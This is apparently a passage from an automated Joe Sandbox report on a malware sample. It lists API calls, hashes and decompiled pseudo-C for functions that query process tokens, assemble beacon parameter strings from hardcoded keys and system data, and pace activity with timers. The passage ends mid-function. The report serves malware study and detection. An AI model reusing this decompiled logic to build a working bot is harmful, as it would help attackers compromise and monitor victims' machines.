                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04217815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04217831
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0421784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 0421785B
                    • NtClose.NTDLL(?), ref: 0421786D
                    • NtClose.NTDLL(00000000), ref: 04217877
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: df768afc3d39f89a76af13bef60a1143c0cdea1ee9dddbc670b24fd9ee3042f1
                    • Instruction ID: 28704f22f91a8061aa6ac02bb2816905eb6b28e250eaad31167f55c5fcdc210e
                    • Opcode Fuzzy Hash: df768afc3d39f89a76af13bef60a1143c0cdea1ee9dddbc670b24fd9ee3042f1
                    • Instruction Fuzzy Hash: E72116B2A10218BBDF01DF99DC88ADEBFBDEF58740F104062F905A6160D7719B84DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042168EB Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E042168EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x421a018; // 0x3639fe1b
				asm("bswap eax");
				_t31 =  *0x421a014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x421a010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x421a00c; // 0xeec43f25
				asm("bswap eax");
				_t34 =  *0x421a320; // 0x87d5a8
				_t3 = _t34 + 0x421b633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x421a02c,  *0x421a004, _t29);
				_t37 = E04214B2C();
				_t38 =  *0x421a320; // 0x87d5a8
				_t4 = _t38 + 0x421b673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x421a320; // 0x87d5a8
					_t8 = _t92 + 0x421b67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E0421256F(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x421a320; // 0x87d5a8
					_t10 = _t87 + 0x421b8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x421a2d8, 0, _t104);
				}
				_t105 = E04214B71();
				if(_t105 != 0) {
					_t82 =  *0x421a320; // 0x87d5a8
					_t12 = _t82 + 0x421b8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x421a2d8, 0, _t105);
				}
				_t106 =  *0x421a3cc; // 0x4a995b0
				_a24 = E04217729(0x421a00a, _t106 + 4);
				_t46 =  *0x421a36c; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x421a320; // 0x87d5a8
					_t15 = _t78 + 0x421b8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x421a368; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x421a320; // 0x87d5a8
					_t17 = _t75 + 0x421b88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t108 = RtlAllocateHeap( *0x421a2d8, 0, 0x800);
					if(_t108 != 0) {
						E042153EC(GetTickCount());
						_t54 =  *0x421a3cc; // 0x4a995b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x421a3cc; // 0x4a995b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x421a3cc; // 0x4a995b0
						_t61 = E042118BA(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x421928c);
							_push(_t111);
							_t66 = E0421252A();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E04211AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E04215F6A();
								}
								HeapFree( *0x421a2d8, 0, _v16);
							}
							HeapFree( *0x421a2d8, 0, _t111);
						}
						RtlFreeHeap( *0x421a2d8, 0, _t108); // executed
					}
					HeapFree( *0x421a2d8, 0, _a16);
				}
				HeapFree( *0x421a2d8, 0, _t113);
				return _a12;
			}




















































                    0x042168eb
                    0x042168eb
                    0x042168f1
                    0x042168f7
                    0x042168ff
                    0x04216901
                    0x04216901
                    0x0421690e
                    0x04216919
                    0x0421691c
                    0x04216927
                    0x0421692a
                    0x0421692f
                    0x04216932
                    0x04216937
                    0x0421693a
                    0x04216946
                    0x04216953
                    0x04216955
                    0x0421695b
                    0x04216960
                    0x0421696b
                    0x0421696d
                    0x04216970
                    0x04216977
                    0x04216979
                    0x04216982
                    0x0421698d
                    0x0421698f
                    0x04216992
                    0x04216992
                    0x04216994
                    0x04216999
                    0x0421699d
                    0x0421699f
                    0x042169a4
                    0x042169b0
                    0x042169b2
                    0x042169be
                    0x042169c0
                    0x042169c0
                    0x042169cb
                    0x042169cf
                    0x042169d1
                    0x042169d6
                    0x042169e2
                    0x042169e4
                    0x042169f0
                    0x042169f2
                    0x042169f2
                    0x042169f8
                    0x04216a0b
                    0x04216a0f
                    0x04216a16
                    0x04216a19
                    0x04216a1e
                    0x04216a29
                    0x04216a2b
                    0x04216a2e
                    0x04216a2e
                    0x04216a30
                    0x04216a37
                    0x04216a3a
                    0x04216a3f
                    0x04216a49
                    0x04216a4b
                    0x04216a53
                    0x04216a6c
                    0x04216a70
                    0x04216a7c
                    0x04216a81
                    0x04216a8a
                    0x04216a9b
                    0x04216a9f
                    0x04216aa8
                    0x04216aae
                    0x04216ab6
                    0x04216abb
                    0x04216ac8
                    0x04216ace
                    0x04216ada
                    0x04216ae0
                    0x04216ae1
                    0x04216ae8
                    0x04216aec
                    0x04216af2
                    0x04216af9
                    0x04216b00
                    0x04216b06
                    0x04216b0d
                    0x04216b11
                    0x04216b1c
                    0x04216b23
                    0x04216b27
                    0x04216b30
                    0x04216b30
                    0x04216b41
                    0x04216b41
                    0x04216b50
                    0x04216b50
                    0x04216b5f
                    0x04216b5f
                    0x04216b71
                    0x04216b71
                    0x04216b80
                    0x04216b90

                    APIs
                    • GetTickCount.KERNEL32 ref: 04216901
                    • wsprintfA.USER32 ref: 0421694E
                    • wsprintfA.USER32 ref: 0421696B
                    • wsprintfA.USER32 ref: 0421698D
                    • wsprintfA.USER32 ref: 042169B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042169C0
                    • wsprintfA.USER32 ref: 042169E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042169F2
                    • wsprintfA.USER32 ref: 04216A29
                    • wsprintfA.USER32 ref: 04216A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04216A66
                    • GetTickCount.KERNEL32 ref: 04216A76
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04216A8A
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04216AA8
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 042118E5
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(?,?,?,04216ABB,?,04A995B0), ref: 042118ED
                      • Part of subcall function 042118BA: strcpy.NTDLL ref: 04211904
                      • Part of subcall function 042118BA: lstrcat.KERNEL32(00000000,?), ref: 0421190F
                      • Part of subcall function 042118BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04216ABB,?,04A995B0), ref: 0421192C
                    • StrTrimA.SHLWAPI(00000000,0421928C,?,04A995B0), ref: 04216ADA
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(04A99B50,00000000,00000000,7691C740,04216AE6,00000000), ref: 0421253A
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(?), ref: 04212542
                      • Part of subcall function 0421252A: lstrcpy.KERNEL32(00000000,04A99B50), ref: 04212556
                      • Part of subcall function 0421252A: lstrcat.KERNEL32(00000000,?), ref: 04212561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04216AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04216B00
                    • lstrcat.KERNEL32(00000000,?), ref: 04216B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04216B11
                      • Part of subcall function 04211AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04211B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04216B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04216B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04A995B0), ref: 04216B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04216B71
                    • HeapFree.KERNEL32(00000000,?), ref: 04216B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: 53c58bb972c31d31722fd6fb5d827a4c17de972f7764def7ea3c4e9b105f0bcf
                    • Instruction ID: 8510f8e058640d606d19402dab593d130557cd11b1ad602879e70f34f0713ac6
                    • Opcode Fuzzy Hash: 53c58bb972c31d31722fd6fb5d827a4c17de972f7764def7ea3c4e9b105f0bcf
                    • Instruction Fuzzy Hash: D9718871701205AFD7129B68FC88F6A7BE8EB68754F090126F909D3270DE39ED45CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04212FC4 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 255memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E04212FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t93;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x421a018; // 0x3639fe1b
				asm("bswap eax");
				_t65 =  *0x421a014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x421a010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x421a00c; // 0xeec43f25
				asm("bswap eax");
				_t68 =  *0x421a320; // 0x87d5a8
				_t3 = _t68 + 0x421b633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x421a02c,  *0x421a004, _t63);
				_t71 = E04214B2C();
				_t72 =  *0x421a320; // 0x87d5a8
				_t4 = _t72 + 0x421b673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x421a320; // 0x87d5a8
					_t8 = _t136 + 0x421b67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139; // executed
				}
				_t76 = E0421256F(_t142); // executed
				_t141 = __imp__; // 0x74e05520
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x421a320; // 0x87d5a8
					_t11 = _t130 + 0x421b8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x421a2d8, 0, _a8);
				}
				_t77 = E04214B71();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x421a320; // 0x87d5a8
					_t15 = _t125 + 0x421b8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x421a2d8, 0, _a8);
				}
				_t154 =  *0x421a3cc; // 0x4a995b0
				_t79 = E04217729(0x421a00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					RtlFreeHeap( *0x421a2d8, _t160, _a20); // executed
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x421a2d8, 0, 0x800); // executed
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x421a2d8, _t160, _v16);
						goto L28;
					}
					E042153EC(GetTickCount());
					_t86 =  *0x421a3cc; // 0x4a995b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x421a3cc; // 0x4a995b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x421a3cc; // 0x4a995b0
					_t93 = E042118BA(1, _t151, _a20,  *_t92); // executed
					_t156 = _t93;
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						RtlFreeHeap( *0x421a2d8, _t160, _a8); // executed
						goto L27;
					}
					StrTrimA(_t156, 0x421928c);
					_push(_t156);
					_t98 = E0421252A();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x421a2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E04215406( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E04215F6A();
						L24:
						HeapFree( *0x421a2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E042122C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_t115 = E04211E51(_t165, _a4, _a12, _a16); // executed
						_v8 = _t115;
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E042117AB(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E04215D6F(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E042117AB(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}
























































                    0x04212fc4
                    0x04212fc4
                    0x04212fc4
                    0x04212fcf
                    0x04212fd6
                    0x04212fd8
                    0x04212fd8
                    0x04212fe5
                    0x04212ff0
                    0x04212ff3
                    0x04212ff8
                    0x04213001
                    0x04213004
                    0x04213009
                    0x0421300c
                    0x04213011
                    0x04213014
                    0x04213020
                    0x0421302d
                    0x0421302f
                    0x04213035
                    0x0421303a
                    0x04213045
                    0x04213047
                    0x0421304a
                    0x04213050
                    0x04213052
                    0x0421305a
                    0x04213065
                    0x04213067
                    0x0421306a
                    0x0421306a
                    0x0421306c
                    0x04213073
                    0x04213079
                    0x0421307c
                    0x0421307f
                    0x04213084
                    0x04213091
                    0x04213093
                    0x04213099
                    0x042130a3
                    0x042130a3
                    0x042130a5
                    0x042130ac
                    0x042130af
                    0x042130b2
                    0x042130b7
                    0x042130c4
                    0x042130c6
                    0x042130d4
                    0x042130d4
                    0x042130d6
                    0x042130e4
                    0x042130e9
                    0x042130ed
                    0x042130f0
                    0x042132b1
                    0x042132bb
                    0x042132c4
                    0x042130f6
                    0x04213102
                    0x0421310a
                    0x0421310d
                    0x042132a5
                    0x042132af
                    0x00000000
                    0x042132af
                    0x04213119
                    0x0421311e
                    0x04213127
                    0x04213138
                    0x0421313c
                    0x04213145
                    0x0421314b
                    0x04213155
                    0x0421315a
                    0x04213161
                    0x0421316a
                    0x04213170
                    0x04213299
                    0x042132a3
                    0x00000000
                    0x042132a3
                    0x0421317c
                    0x04213182
                    0x04213183
                    0x0421318a
                    0x0421318d
                    0x0421328f
                    0x04213297
                    0x00000000
                    0x04213297
                    0x04213196
                    0x0421319d
                    0x042131a5
                    0x042131aa
                    0x042131b3
                    0x042131be
                    0x042131c5
                    0x042131c8
                    0x042132c7
                    0x0421327b
                    0x0421327b
                    0x04213280
                    0x0421328b
                    0x0421328d
                    0x00000000
                    0x0421328d
                    0x042131d2
                    0x042131d9
                    0x042131dc
                    0x042131e1
                    0x042131ec
                    0x042131f1
                    0x042131f4
                    0x042131fa
                    0x04213200
                    0x04213206
                    0x04213209
                    0x0421320f
                    0x04213212
                    0x04213217
                    0x0421321b
                    0x0421321b
                    0x04213227
                    0x04213233
                    0x04213237
                    0x04213239
                    0x0421323e
                    0x04213240
                    0x04213245
                    0x0421324a
                    0x04213257
                    0x0421325f
                    0x04213262
                    0x04213262
                    0x0421323e
                    0x00000000
                    0x04213229
                    0x0421322d
                    0x04213264
                    0x04213267
                    0x04213270
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04213270
                    0x0421322f
                    0x00000000
                    0x0421322f
                    0x04213227

                    APIs
                    • GetTickCount.KERNEL32 ref: 04212FD8
                    • wsprintfA.USER32 ref: 04213028
                    • wsprintfA.USER32 ref: 04213045
                    • wsprintfA.USER32 ref: 04213065
                    • wsprintfA.USER32 ref: 04213091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042130A3
                    • wsprintfA.USER32 ref: 042130C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042130D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04213102
                    • GetTickCount.KERNEL32 ref: 04213113
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04213127
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04213145
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 042118E5
                      • Part of subcall function 042118BA: lstrlen.KERNEL32(?,?,?,04216ABB,?,04A995B0), ref: 042118ED
                      • Part of subcall function 042118BA: strcpy.NTDLL ref: 04211904
                      • Part of subcall function 042118BA: lstrcat.KERNEL32(00000000,?), ref: 0421190F
                      • Part of subcall function 042118BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04216ABB,?,04A995B0), ref: 0421192C
                    • StrTrimA.SHLWAPI(00000000,0421928C,?,04A995B0), ref: 0421317C
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(04A99B50,00000000,00000000,7691C740,04216AE6,00000000), ref: 0421253A
                      • Part of subcall function 0421252A: lstrlen.KERNEL32(?), ref: 04212542
                      • Part of subcall function 0421252A: lstrcpy.KERNEL32(00000000,04A99B50), ref: 04212556
                      • Part of subcall function 0421252A: lstrcat.KERNEL32(00000000,?), ref: 04212561
                    • lstrcpy.KERNEL32(00000000,?), ref: 0421319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 042131A5
                    • lstrcat.KERNEL32(00000000,?), ref: 042131B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 042131B9
                      • Part of subcall function 04215406: lstrlen.KERNEL32(?,00000000,04A99D58,00000000,04213C77,04A99F7B,69B25F44,?,?,?,?,69B25F44,00000005,0421A00C,4D283A53,?), ref: 0421540D
                      • Part of subcall function 04215406: mbstowcs.NTDLL ref: 04215436
                      • Part of subcall function 04215406: memset.NTDLL ref: 04215448
                    • wcstombs.NTDLL ref: 0421324A
                      • Part of subcall function 04211E51: SysAllocString.OLEAUT32(?), ref: 04211E92
                      • Part of subcall function 04211E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04211F14
                      • Part of subcall function 04211E51: StrStrIW.SHLWAPI(?,006E0069), ref: 04211F53
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0421328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04213297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04A995B0), ref: 042132A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042132AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 042132BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: 903a7518ade69836655df9c40f226242a3b3aeae4e7c6f0bbdf668457a68cdfb
                    • Instruction ID: 1ae7732107ecee1fd7c663042552daac7ffe44b0a9b2e7a4694eddfd87dcc1a0
                    • Opcode Fuzzy Hash: 903a7518ade69836655df9c40f226242a3b3aeae4e7c6f0bbdf668457a68cdfb
                    • Instruction Fuzzy Hash: 87912871A01209AFDB11DFA8EC48AAA7BF9EF68354F148055F80897270DB35ED51DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04215458 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151timememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 4215458-421548a memset CreateWaitableTimerA 103 4215490-42154e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->103 104 421560b-4215611 GetLastError 102->104 106 4215573-4215579 103->106 107 42154ef-42154f2 103->107 105 4215615-421561f 104->105 108 421557a-421557e 106->108 109 42154f4 call 4213399 107->109 110 42154fd 107->110 111 4215580-4215582 108->111 112 421558e-4215592 108->112 115 42154f9-42154fb 109->115 114 4215507 110->114 111->112 112->108 116 4215594-421559e CloseHandle 112->116 117 421550b-4215510 114->117 115->110 115->114 116->105 118 4215523-4215550 call 4213a12 117->118 119 4215512-4215519 117->119 123 42155a0-42155a5 118->123 124 4215552-421555d 118->124 119->118 120 421551b 119->120 120->118 126 42155c4-42155cc 123->126 127 42155a7-42155ad 123->127 124->117 125 421555f-421556f call 42117c0 124->125 125->106 128 42155d2-4215600 _allmul SetWaitableTimer WaitForMultipleObjects 126->128 127->106 130 42155af-42155c2 call 4215f6a 127->130 128->117 131 4215606 128->131 130->128 131->106
                    C-Code - Quality: 83%
                    			E04215458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x421a2e0);
					_v76 = 0;
					_v80 = 0;
					L0421818A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x421a30c; // 0x2ec
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x421a2ec = 5;
						} else {
							_t69 = E04213399(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x421a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04213A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_t97 = _t66 - 3;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E042117C0(_t75, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x421a2e4);
